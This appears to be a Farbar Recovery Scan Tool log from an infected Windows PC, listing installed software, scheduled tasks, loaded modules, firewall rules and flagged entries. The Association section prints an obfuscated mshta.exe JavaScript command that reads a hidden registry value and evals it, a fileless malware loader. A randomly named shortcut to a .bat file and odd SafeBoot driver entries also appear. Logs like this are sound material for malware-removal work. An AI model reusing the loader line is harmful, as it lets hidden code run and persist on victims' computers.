WIDCOMM Bluetooth Software (HKLM\...\{A1439D4F-FD46-47F2-A1D3-FEE097C29A09}) (Version: 6.5.1.6650 - Broadcom Corporation)
World of Warcraft (HKLM-x32\...\World of Warcraft) (Version:  - Blizzard Entertainment)
XSplit Broadcaster (HKLM-x32\...\{4366B373-1578-43E9-8FC9-3C5D6D529314}) (Version: 2.8.1607.1936 - SplitmediaLabs)
XSplit Gamecaster (HKLM-x32\...\{D3C9DBAA-5395-4971-A962-553C7DBEA423}) (Version: 2.8.1605.2355 - SplitmediaLabs)
 
==================== Custom CLSID (Whitelisted): ==========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
CustomCLSID: HKU\S-1-5-21-1863785947-2063213224-1850305329-1000_Classes\CLSID\{e8c77137-e224-5791-b6e9-ff0305797a13}\InprocServer32 -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll (Adobe Systems)
 
==================== Scheduled Tasks (Whitelisted) =============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
Task: {1D4FCD0B-833F-4673-AF4F-C1D32AB526D0} - System32\Tasks\{0DCDAAAA-93EF-49E2-AA0E-3E402E8F35FA} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe [2016-08-24] (Adobe Systems Incorporated)
Task: {23C4AFE3-C344-4CC1-B947-6F7861B09475} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-02-01] (Google Inc.)
Task: {34DEFD4E-26EB-489B-B544-9DCC0C99C02E} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2017-01-08] (Adobe Systems Incorporated)
Task: {3BA2D665-D4D2-44EB-A14C-4B1628C5D38D} - System32\Tasks\PCDEventLauncherTask => C:\Program Files\Dell\SupportAssist\sessionchecker.exe [2016-09-13] (PC-Doctor, Inc.)
Task: {4680A0DC-A27E-4500-8101-3C3720F498FC} - System32\Tasks\{CCA1CD58-709C-423B-BBBB-0C7DBE39E355} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe [2016-08-24] (Adobe Systems Incorporated)
Task: {51B3635B-5D21-4E7D-A92A-01533537CCD7} - System32\Tasks\AVAST Software\Avast settings backup => C:\Program Files\Common Files\AV\avast! Antivirus\backup.exe [2016-06-02] (AVAST Software)
Task: {555CC1F2-72BC-40E7-869B-59C3B9120774} - System32\Tasks\{6418743D-1170-48C9-9BCE-CBDA001F2EF3} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe [2016-08-24] (Adobe Systems Incorporated)
Task: {5AC7F887-71CA-4AA1-96A4-0A5E34D1F1BB} - System32\Tasks\AdobeAAMUpdater-1.0-Owner-PC-Owner => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [2016-07-01] (Adobe Systems Incorporated)
Task: {67A0DA7E-E534-48A2-8A20-44047E59A2D5} - System32\Tasks\SystemToolsDailyTest => uaclauncher.exe
Task: {6C79847C-860A-4953-AA45-A65B21DF1150} - System32\Tasks\DropboxUpdateTaskMachineUA => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [2016-08-04] (Dropbox, Inc.)
Task: {800C4F0A-B96F-4306-8FC6-01AABCB3E309} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-02-01] (Google Inc.)
Task: {828E25EE-E30B-477C-BB58-2F53210A9F30} - System32\Tasks\UninstallDDS-C960901F-CE14-4DE1-9729-1305F719A337 => C:\Windows\TEMP\DeleteFolderTask.exe [2016-01-29] () <==== ATTENTION
Task: {8DCDEE16-AEB7-42B2-B7F8-C48F3E74066D} - System32\Tasks\SafeZone scheduled Autoupdate 1458696918 => C:\Program Files\AVAST Software\SZBrowser\launcher.exe [2016-09-06] (Avast Software)
Task: {8EBB3B0F-59FA-41FE-899B-DF576A5B1C11} - System32\Tasks\PCDDataUploadTask => uaclauncher.exe
Task: {BF380B2F-370F-4DE2-8998-A2681C51FFDB} - System32\Tasks\{B042A631-BD1D-41D8-901A-5601A5BAD7F0} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe [2016-08-24] (Adobe Systems Incorporated)
Task: {D257D2D9-DBD5-4DE2-B470-0269294D41D0} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2016-06-25] (Adobe Systems Incorporated)
Task: {DA220C2C-86E5-4104-9CE4-34070D5F9C3D} - System32\Tasks\avast! Emergency Update => C:\Program Files\AVAST Software\Avast\AvastEmUpdate.exe [2016-10-03] (AVAST Software)
Task: {E75EB6BB-4C1C-40AB-A7F7-60D5A2D309FF} - System32\Tasks\Dell SupportAssistAgent AutoUpdate => C:\Program Files (x86)\Dell\SupportAssistAgent\bin\SupportAssist.exe [2016-09-09] (Dell Inc.)
Task: {EEA26988-B289-48A6-A4F5-4F3D5FAB5A80} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2016-02-23] (Apple Inc.)
Task: {F1C6BBBF-4E97-427D-B1DD-42BD81992A6E} - System32\Tasks\DropboxUpdateTaskMachineCore => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [2016-08-04] (Dropbox, Inc.)
 
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
 
Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\DropboxUpdateTaskMachineCore.job => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe
Task: C:\Windows\Tasks\DropboxUpdateTaskMachineUA.job => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe
 
==================== Shortcuts =============================
 
(The entries could be listed to be restored or removed.)
 
Shortcut: C:\Users\Owner\AppData\Local\c345b\ce9d6.lnk -> C:\Users\Owner\AppData\Local\c345b\a0f5a.bat ()
 
==================== Loaded Modules (Whitelisted) ==============
 
2015-12-22 21:46 - 2016-07-10 15:17 - 00134712 _____ () C:\Program Files\NVIDIA Corporation\Display\NvSmartMax64.dll
2016-10-05 18:17 - 2016-10-05 18:17 - 00092472 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll
2016-11-17 01:28 - 2016-11-17 01:28 - 01353528 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\libxml2.dll
2016-08-10 23:36 - 2016-06-14 12:03 - 00367552 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\MessageBus.dll
2016-08-10 23:36 - 2016-06-14 12:03 - 01147328 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\libprotobuf.dll
2016-08-10 23:36 - 2016-06-14 12:03 - 03611584 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\Poco.dll
2016-02-02 10:53 - 2016-06-14 12:03 - 00288192 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamBase.dll
2016-12-21 12:39 - 2016-12-14 12:55 - 02259232 _____ () D:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\PoliciesControllerImpl.dll
2016-05-22 18:33 - 2016-05-22 18:33 - 00491184 _____ () C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll
2016-08-10 23:36 - 2016-06-14 12:03 - 02665920 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\Plugins\NSS\NvMdnsPlugin.dll
2016-08-10 23:36 - 2016-06-14 12:03 - 01988544 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\Plugins\NSS\NvPortForwardPlugin.dll
2016-08-10 23:36 - 2016-06-14 12:03 - 01840576 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\Plugins\NSS\RtspPlugin.dll
2016-02-02 10:53 - 2016-06-14 12:03 - 00207296 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\RtspServer.dll
2016-08-10 23:36 - 2016-06-14 12:03 - 00034240 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\boost_system-vc120-mt-1_58.dll
2016-08-10 23:36 - 2016-06-14 12:03 - 00920000 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\boost_regex-vc120-mt-1_58.dll
2016-05-28 23:38 - 2016-03-21 12:28 - 01357264 _____ () C:\Program Files\Tablet\Wacom\libxml2.dll
2016-10-03 00:42 - 2016-10-03 00:42 - 00169064 _____ () C:\Program Files\AVAST Software\Avast\JsonRpcServer.dll
2017-01-08 10:02 - 2017-01-08 10:02 - 03138056 _____ () C:\Program Files\AVAST Software\Avast\defs\17010801\algo.dll
2016-10-03 00:42 - 2016-10-03 00:42 - 00482928 _____ () C:\Program Files\AVAST Software\Avast\ffl2.dll
2016-02-02 10:53 - 2016-06-14 12:03 - 00018880 _____ () C:\Program Files (x86)\NVIDIA Corporation\Update Core\detoured.dll
2016-02-01 15:29 - 2016-12-08 07:13 - 00656160 _____ () D:\games\SDL2.dll
2016-02-01 15:29 - 2016-08-31 17:02 - 04969248 _____ () D:\games\v8.dll
2016-02-01 15:29 - 2016-08-31 17:02 - 01563936 _____ () D:\games\icui18n.dll
2016-02-01 15:29 - 2016-08-31 17:02 - 01195296 _____ () D:\games\icuuc.dll
2016-02-01 15:29 - 2016-12-19 18:25 - 02322720 _____ () D:\games\video.dll
2016-02-01 15:29 - 2016-01-26 23:49 - 02549760 _____ () D:\games\libavcodec-56.dll
2016-02-01 15:29 - 2016-01-26 23:49 - 00442880 _____ () D:\games\libavutil-54.dll
2016-02-01 15:29 - 2016-01-26 23:49 - 00491008 _____ () D:\games\libavformat-56.dll
2016-02-01 15:29 - 2016-01-26 23:49 - 00332800 _____ () D:\games\libavresample-2.dll
2016-02-01 15:29 - 2016-01-26 23:49 - 00485888 _____ () D:\games\libswscale-3.dll
2016-02-01 15:29 - 2016-12-19 18:25 - 00838944 _____ () D:\games\bin\chromehtml.DLL
2016-03-14 08:25 - 2016-07-04 14:17 - 00266560 _____ () D:\games\openvr_api.dll
2016-11-17 01:29 - 2016-11-17 01:29 - 01041720 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll
2016-10-05 18:18 - 2016-10-05 18:18 - 00080184 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\zlib1.dll
2016-11-17 01:28 - 2016-11-17 01:28 - 00189752 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxslt.dll
2016-10-03 00:42 - 2016-10-03 00:42 - 48936448 _____ () C:\Program Files\AVAST Software\Avast\libcef.dll
2012-09-12 23:38 - 2012-09-12 23:38 - 02144104 _____ () D:\Program Files (x86)\Logitech\LWS\Webcam Software\QtCore4.dll
2012-09-12 23:38 - 2012-09-12 23:38 - 07955304 _____ () D:\Program Files (x86)\Logitech\LWS\Webcam Software\QtGui4.dll
2012-09-12 23:38 - 2012-09-12 23:38 - 00341352 _____ () D:\Program Files (x86)\Logitech\LWS\Webcam Software\QtXml4.dll
2012-09-12 23:38 - 2012-09-12 23:38 - 00028008 _____ () D:\Program Files (x86)\Logitech\LWS\Webcam Software\imageformats\QGif4.dll
2012-09-12 23:38 - 2012-09-12 23:38 - 00127336 _____ () D:\Program Files (x86)\Logitech\LWS\Webcam Software\imageformats\QJpeg4.dll
2016-08-04 13:36 - 2016-11-11 12:36 - 00035792 _____ () C:\Program Files (x86)\Dropbox\Client\_multiprocessing.pyd
2016-08-04 13:36 - 2016-11-11 12:36 - 00100296 _____ () C:\Program Files (x86)\Dropbox\Client\_ctypes.pyd
2016-08-04 13:36 - 2016-11-11 12:36 - 00018888 _____ () C:\Program Files (x86)\Dropbox\Client\select.pyd
2016-08-04 13:36 - 2016-12-21 10:26 - 00019760 _____ () C:\Program Files (x86)\Dropbox\Client\tornado.speedups.pyd
2016-08-04 13:36 - 2016-11-11 12:36 - 00694224 _____ () C:\Program Files (x86)\Dropbox\Client\unicodedata.pyd
2016-12-21 16:48 - 2016-12-21 10:26 - 00020816 _____ () C:\Program Files (x86)\Dropbox\Client\cryptography.hazmat.bindings._constant_time.pyd
2016-08-04 13:36 - 2016-11-11 12:37 - 00123856 _____ () C:\Program Files (x86)\Dropbox\Client\_cffi_backend.pyd
2016-12-21 16:48 - 2016-12-21 10:26 - 01682760 _____ () C:\Program Files (x86)\Dropbox\Client\cryptography.hazmat.bindings._openssl.pyd
2016-12-21 16:48 - 2016-12-21 10:26 - 00020808 _____ () C:\Program Files (x86)\Dropbox\Client\cryptography.hazmat.bindings._padding.pyd
2016-12-21 16:48 - 2016-11-11 12:36 - 00145864 _____ () C:\Program Files (x86)\Dropbox\Client\pyexpat.pyd
2016-12-21 16:48 - 2016-11-11 12:37 - 00019408 _____ () C:\Program Files (x86)\Dropbox\Client\faulthandler.pyd
2016-12-21 16:48 - 2016-11-11 12:36 - 00116688 _____ () C:\Program Files (x86)\Dropbox\Client\pywintypes27.dll
2016-08-04 13:36 - 2016-11-11 12:38 - 00105928 _____ () C:\Program Files (x86)\Dropbox\Client\win32api.pyd
2016-08-04 13:36 - 2016-12-21 10:26 - 00021312 _____ () C:\Program Files (x86)\Dropbox\Client\winffi.crt.compiled._winffi_crt.pyd
2016-12-21 16:48 - 2016-12-21 10:26 - 00052024 _____ () C:\Program Files (x86)\Dropbox\Client\psutil._psutil_windows.pyd
2016-12-21 16:48 - 2016-12-21 10:26 - 00038696 _____ () C:\Program Files (x86)\Dropbox\Client\fastpath.pyd
2016-12-21 16:48 - 2016-11-11 12:36 - 00392144 _____ () C:\Program Files (x86)\Dropbox\Client\pythoncom27.dll
2016-12-21 16:48 - 2016-11-11 12:38 - 00020936 _____ () C:\Program Files (x86)\Dropbox\Client\mmapfile.pyd
2016-08-04 13:36 - 2016-11-11 12:38 - 00024528 _____ () C:\Program Files (x86)\Dropbox\Client\win32event.pyd
2016-08-04 13:36 - 2016-11-11 12:39 - 00116176 _____ () C:\Program Files (x86)\Dropbox\Client\win32security.pyd
2016-08-04 13:36 - 2016-12-21 10:26 - 00381752 _____ () C:\Program Files (x86)\Dropbox\Client\win32com.shell.shell.pyd
2016-08-04 13:36 - 2016-11-11 12:38 - 00124880 _____ () C:\Program Files (x86)\Dropbox\Client\win32file.pyd
2016-08-04 13:36 - 2016-12-21 10:26 - 00025424 _____ () C:\Program Files (x86)\Dropbox\Client\winffi.kernel32.compiled._winffi_kernel32.pyd
2016-08-04 13:36 - 2016-11-11 12:38 - 00024016 _____ () C:\Program Files (x86)\Dropbox\Client\win32clipboard.pyd
2016-08-04 13:36 - 2016-11-11 12:38 - 00175560 _____ () C:\Program Files (x86)\Dropbox\Client\win32gui.pyd
2016-08-04 13:36 - 2016-11-11 12:38 - 00030160 _____ () C:\Program Files (x86)\Dropbox\Client\win32pipe.pyd
2016-08-04 13:36 - 2016-11-11 12:39 - 00043472 _____ () C:\Program Files (x86)\Dropbox\Client\win32process.pyd
2016-08-04 13:36 - 2016-11-11 12:39 - 00048592 _____ () C:\Program Files (x86)\Dropbox\Client\win32service.pyd
2016-08-04 13:36 - 2016-11-11 12:38 - 00057808 _____ () C:\Program Files (x86)\Dropbox\Client\win32evtlog.pyd
2016-08-04 13:36 - 2016-11-11 12:39 - 00024016 _____ () C:\Program Files (x86)\Dropbox\Client\win32profile.pyd
2016-12-21 16:48 - 2016-12-21 10:26 - 00246592 _____ () C:\Program Files (x86)\Dropbox\Client\breakpad.client.windows.handler.pyd
2016-12-21 16:48 - 2016-12-21 10:26 - 00026456 _____ () C:\Program Files (x86)\Dropbox\Client\dropbox.infinite.win.compiled._driverinstallation.pyd
2016-08-04 13:36 - 2016-11-11 12:37 - 00241104 _____ () C:\Program Files (x86)\Dropbox\Client\_jpegtran.pyd
2016-12-21 16:48 - 2016-12-21 10:26 - 00020280 _____ () C:\Program Files (x86)\Dropbox\Client\cpuid.compiled._cpuid.pyd
2016-08-04 13:36 - 2016-11-11 12:39 - 00028616 _____ () C:\Program Files (x86)\Dropbox\Client\win32ts.pyd
2016-08-04 13:36 - 2016-12-21 10:26 - 00023376 _____ () C:\Program Files (x86)\Dropbox\Client\winscreenshot.compiled._CaptureScreenshot.pyd
2016-08-04 13:36 - 2016-12-21 10:26 - 00020800 _____ () C:\Program Files (x86)\Dropbox\Client\winffi.iphlpapi._winffi_iphlpapi.pyd
2016-08-04 13:36 - 2016-12-21 10:26 - 00019776 _____ () C:\Program Files (x86)\Dropbox\Client\winffi.winerror._winffi_winerror.pyd
2016-08-04 13:36 - 2016-12-21 10:26 - 00020800 _____ () C:\Program Files (x86)\Dropbox\Client\winffi.wininet._winffi_wininet.pyd
2016-08-04 13:36 - 2016-11-11 12:39 - 00350152 _____ () C:\Program Files (x86)\Dropbox\Client\winxpgui.pyd
2016-08-04 13:36 - 2016-12-21 10:26 - 00022352 _____ () C:\Program Files (x86)\Dropbox\Client\winverifysignature.compiled._VerifySignature.pyd
2016-12-21 16:48 - 2016-12-21 10:26 - 00024392 _____ () C:\Program Files (x86)\Dropbox\Client\librsyncffi.compiled._librsyncffi.pyd
2016-12-21 16:48 - 2016-11-11 12:35 - 00036296 _____ () C:\Program Files (x86)\Dropbox\Client\librsync.dll
2016-12-21 16:48 - 2016-12-21 10:26 - 00084280 _____ () C:\Program Files (x86)\Dropbox\Client\dropbox_sqlite_ext.DLL
2016-12-21 16:48 - 2016-12-21 10:26 - 01826096 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtCore.pyd
2016-08-04 13:36 - 2016-11-11 12:37 - 00083912 _____ () C:\Program Files (x86)\Dropbox\Client\sip.pyd
2016-12-21 16:48 - 2016-12-21 10:26 - 00531248 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtNetwork.pyd
2016-12-21 16:48 - 2016-12-21 10:26 - 03928880 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtWidgets.pyd
2016-12-21 16:48 - 2016-12-21 10:26 - 01972528 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtGui.pyd
2016-12-21 16:48 - 2016-12-21 10:26 - 00133424 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtWebKit.pyd
2016-12-21 16:48 - 2016-12-21 10:26 - 00224056 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtWebKitWidgets.pyd
2016-12-21 16:48 - 2016-12-21 10:26 - 00207672 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtPrintSupport.pyd
2016-08-04 13:36 - 2016-12-21 10:26 - 00020288 _____ () C:\Program Files (x86)\Dropbox\Client\winffi.user32._winffi_user32.pyd
2016-12-21 16:48 - 2016-11-11 12:42 - 00017864 _____ () C:\Program Files (x86)\Dropbox\Client\libEGL.dll
2016-12-21 16:48 - 2016-11-11 12:42 - 01631184 _____ () C:\Program Files (x86)\Dropbox\Client\libGLESv2.dll
2016-12-21 16:48 - 2016-12-21 10:26 - 00042808 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtWebChannel.pyd
2016-12-21 16:48 - 2016-12-21 10:26 - 00171320 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtWebEngineWidgets.pyd
2016-12-21 16:48 - 2016-12-21 10:26 - 00357680 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtQml.pyd
2016-08-04 13:36 - 2016-11-11 12:39 - 00060880 _____ () C:\Program Files (x86)\Dropbox\Client\win32print.pyd
2016-08-04 13:36 - 2016-12-21 10:26 - 00024904 _____ () C:\Program Files (x86)\Dropbox\Client\winffi.winhttp.compiled._winffi_winhttp.pyd
2016-12-21 16:48 - 2016-12-21 10:26 - 00546096 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtQuick.pyd
2016-12-15 08:51 - 2016-12-05 08:21 - 67304736 _____ () D:\games\bin\cef\cef.win7\libcef.dll
2016-02-01 15:29 - 2016-12-19 18:25 - 00388384 _____ () D:\games\steam.dll
2016-02-01 15:29 - 2015-09-24 15:52 - 00119208 _____ () D:\games\winh264.dll
2015-09-04 19:34 - 2015-09-04 19:34 - 01243936 _____ () C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\ACE.dll
2015-12-22 21:49 - 2015-01-27 08:26 - 01905904 ____N () C:\Program Files (x86)\Dell Backup and Recovery\Components\Restore\STRestoreAPI.dll
2015-12-22 21:49 - 2012-11-25 20:19 - 01153384 _____ () C:\Program Files (x86)\Dell Backup and Recovery\Components\Restore\libxml2.dll
2015-12-22 21:49 - 2014-02-18 12:12 - 00117568 _____ () C:\Program Files (x86)\Dell Backup and Recovery\Components\Restore\zlib1.dll
2016-12-15 09:21 - 2016-12-07 23:29 - 01829208 _____ () C:\Program Files (x86)\Google\Chrome\Application\55.0.2883.87\libglesv2.dll
2016-12-15 09:21 - 2016-12-07 23:29 - 00085848 _____ () C:\Program Files (x86)\Google\Chrome\Application\55.0.2883.87\libegl.dll
2016-12-15 22:12 - 2016-12-15 22:12 - 17833560 _____ () C:\Users\Owner\AppData\Local\Google\Chrome\User Data\PepperFlash\24.0.0.186\pepflashplayer.dll
 
==================== Alternate Data Streams (Whitelisted) =========
 
(If an entry is included in the fixlist, only the ADS will be removed.)
 
 
==================== Safe Mode (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
 
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\37065567.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\44097241.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\70022230.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\37065567.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\44097241.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\70022230.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\McMPFSvc => ""="Service"
 
==================== Association (Whitelisted) ===============
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed.)
 
HKU\S-1-5-21-1863785947-2063213224-1850305329-1000\Software\Classes\75a29: "C:\Windows\system32\mshta.exe" "javascript:Dv6Ty="kpDGulS";W8f=new ActiveXObject("WScript.Shell");aCVk71="PBz2";D4kLn=W8f.RegRead("HKCU\\software\\bykshfet\\noce");A4M5Vb="HZmwr";eval(D4kLn);WFchl11xY="O5wuSTc";" <===== ATTENTION
 
==================== Internet Explorer trusted/restricted ===============
 
(If an entry is included in the fixlist, it will be removed from the registry.)
 
IE trusted site: HKU\S-1-5-21-1863785947-2063213224-1850305329-1000\...\dell.com -> dell.com
 
==================== Hosts content: ===============================
 
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
 
2009-07-13 18:34 - 2009-06-10 13:00 - 00000824 ____A C:\Windows\system32\Drivers\etc\hosts
 
 
==================== Other Areas ============================
 
(Currently there is no automatic fix for this section.)
 
HKU\S-1-5-21-1863785947-2063213224-1850305329-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 192.168.254.254
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.
 
==================== MSCONFIG/TASK MANAGER disabled items ==
 
 
==================== FirewallRules (Whitelisted) ===============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
FirewallRules: [SPPSVC-In-TCP] => %SystemRoot%\system32\sppsvc.exe
FirewallRules: [SPPSVC-In-TCP-NoScope] => %SystemRoot%\system32\sppsvc.exe
FirewallRules: [{A543F10B-7594-41E4-BB78-74DD4CFEFAD0}] => D:\games\Steam.exe
FirewallRules: [{504E1E8F-1998-4A28-B535-816B582F3EF7}] => D:\games\Steam.exe
FirewallRules: [{537E98E5-CCC8-4EA6-A3DE-DE239833CEB9}] => D:\games\bin\steamwebhelper.exe
FirewallRules: [{27A13F94-FBF5-4304-8E9A-27C8F6377CAE}] => D:\games\bin\steamwebhelper.exe
FirewallRules: [{DF55312E-A87E-4636-9AEB-22CC4CCFCED8}] => C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{A598F13A-E577-4115-B96F-75DAADDCA32E}] => C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{DC82047C-F571-4D27-AE47-8E25AA709F8C}] => D:\games\steamapps\common\GoatSimulator\Binaries\Win32\GoatGame-Win32-Shipping.exe
FirewallRules: [{97F1E280-1F58-4036-8D3B-A4AB0AFDE07C}] => D:\games\steamapps\common\GoatSimulator\Binaries\Win32\GoatGame-Win32-Shipping.exe
FirewallRules: [{4336F6A7-BFB9-4856-AE41-9969159C373D}] => D:\games\steamapps\common\Ostrich Island\OstrichIsland.exe
FirewallRules: [{E3E49540-DA16-4843-B75D-9709FB44CEE9}] => D:\games\steamapps\common\Ostrich Island\OstrichIsland.exe
FirewallRules: [{B8000D5F-C3DC-463D-A5DE-01CCDB10685D}] => C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
FirewallRules: [{97499616-5698-43D4-B1F0-BC20871CD2D2}] => C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
FirewallRules: [{5BE8033D-6848-4D0F-B23F-F6914ACE3BF2}] => C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe
FirewallRules: [{304386CC-06C8-4836-B0F5-5678DFED9F8E}] => C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe
FirewallRules: [{5B04FA9C-9A62-471F-9BFF-CC5BC42E009D}] => C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamUserAgent.exe
FirewallRules: [{FD172805-0AC1-4E21-B2AC-FE3602F0B65A}] => C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{1106F23D-44B2-447D-8DF2-D0A0E5637D22}] => C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{1F93974D-31E5-4699-BE57-C8FF207FA657}] => D:\games\steamapps\common\Dino D-Day\dinodday.exe
FirewallRules: [{DB8073E7-FBA9-486A-9BCA-13E3B5BFC64E}] => D:\games\steamapps\common\Dino D-Day\dinodday.exe
FirewallRules: [{AF4FD28D-EECE-42FD-A184-44C5AE397016}] => D:\games\SquareEnix\FINAL FANTASY XIV - A Realm Reborn\boot\ffxivboot.exe
FirewallRules: [{5DAA871E-4CE0-4FB2-863D-83DC31CA1402}] => D:\games\SquareEnix\FINAL FANTASY XIV - A Realm Reborn\boot\ffxivboot.exe
FirewallRules: [{82E3BF6E-DB47-4974-A63F-F880E93F9B57}] => D:\games\SquareEnix\FINAL FANTASY XIV - A Realm Reborn\boot\ffxivlauncher.exe
FirewallRules: [{63875D53-438A-4457-8643-5BC6ED626346}] => D:\games\SquareEnix\FINAL FANTASY XIV - A Realm Reborn\boot\ffxivlauncher.exe
FirewallRules: [{8A1060E2-36CD-424E-9320-E311EB56BE35}] => C:\Program Files\AVAST Software\Avast\ng\vbox\aswFe.exe
FirewallRules: [{2ED9BF3A-D02D-4E47-9BCC-55A8AA11AA26}] => C:\Program Files\AVAST Software\Avast\ng\vbox\aswFe.exe
FirewallRules: [{0D06A544-D362-47A6-B2D4-EEE52EF403FB}] => C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{53406011-FA4B-4CBE-97D5-97483A8E0E10}] => C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{5B050F35-85EF-46DD-8FF1-33E6847C2206}] => C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{837B45AC-549E-44FE-AD60-EBE4C5528D20}] => C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{98EB06F7-102D-4163-8D4C-A7DA95FF8468}] => C:\Program Files\AVAST Software\Avast\ng\vbox\aswFe.exe
FirewallRules: [{3A940815-874F-4B98-8ADD-8914CBE6FDBD}] => C:\Program Files\AVAST Software\Avast\ng\vbox\aswFe.exe
FirewallRules: [{06543AA5-9AA0-4C9F-B015-165FFE1C7091}] => D:\games\steamapps\common\Borderlands 2\Binaries\Win32\Launcher.exe
FirewallRules: [{41219093-1F3B-4F4C-9F25-1055F0D075CF}] => D:\games\steamapps\common\Borderlands 2\Binaries\Win32\Launcher.exe
FirewallRules: [{B4AB56C1-ACE3-49B3-812B-9B328A5B41A4}] => D:\games\steamapps\common\Dead by Daylight Alpha Access\DeadByDaylight.exe
FirewallRules: [{F322558A-051F-411A-A513-080FDF36E289}] => D:\games\steamapps\common\Dead by Daylight Alpha Access\DeadByDaylight.exe
FirewallRules: [TCP Query User{F244CCA8-2669-4C85-A321-8B0D07B5380D}D:\games\steamapps\common\dead by daylight alpha access\deadbydaylight\binaries\win64\deadbydaylight-win64-shipping.exe] => D:\games\steamapps\common\dead by daylight alpha access\deadbydaylight\binaries\win64\deadbydaylight-win64-shipping.exe
